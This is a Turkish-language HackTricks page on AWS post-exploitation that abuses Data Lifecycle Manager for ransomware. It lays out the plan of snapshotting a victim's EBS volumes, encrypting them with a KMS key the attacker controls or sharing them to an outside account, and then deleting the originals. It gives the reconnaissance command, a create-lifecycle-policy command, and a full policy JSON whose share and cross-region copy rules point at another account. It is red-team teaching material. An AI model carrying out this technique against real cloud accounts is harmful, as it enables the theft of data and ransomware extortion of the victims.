AWS - DLM Post Exploitation

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

Bir ransomware saldırısı, mümkün olduğunca çok EBS volumes şifreleyip ardından mevcut EC2 instances, EBS volumes ve snapshots silinerek gerçekleştirilebilir. Bu kötü amaçlı faaliyeti otomatikleştirmek için Amazon DLM kullanılabilir; snapshots’ları başka bir AWS hesabına ait bir KMS key ile şifreleyip şifrelenmiş snapshots’ları farklı bir hesaba aktarabilirler. Alternatif olarak, snapshots’ları şifrelemeden kendi kontrol ettikleri bir hesaba aktarabilir ve orada şifreleyebilirler. Mevcut EBS volumes veya snapshots’ları doğrudan şifrelemek kolay olmasa da, yeni bir volume veya snapshot oluşturarak bunu yapmak mümkündür.

İlk olarak, instance ID, volume ID, encryption status, attachment status ve volume type gibi bilgiler toplamak için aşağıdaki komut kullanılacaktır.

aws ec2 describe-volumes

İkinci olarak, lifecycle policy oluşturulacaktır. Bu komut, DLM API’sini kullanarak belirtilen volume’ların belirlenen bir saatte otomatik olarak günlük snapshot’larını alacak bir lifecycle policy ayarlar. Ayrıca snapshot’lara belirli tag’ler uygular ve volume’lardan snapshot’lara tag’leri kopyalar. policyDetails.json dosyası, hedef tag’ler, zamanlama, isteğe bağlı şifreleme için KMS key’in ARN’si ve snapshot paylaşımı için hedef hesap gibi lifecycle policy’nin ayrıntılarını içerir; bu işlemler kurbanın CloudTrail loglarına kaydedilecektir.

aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

Politika belgesinin bir şablonu burada görülebilir:

{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin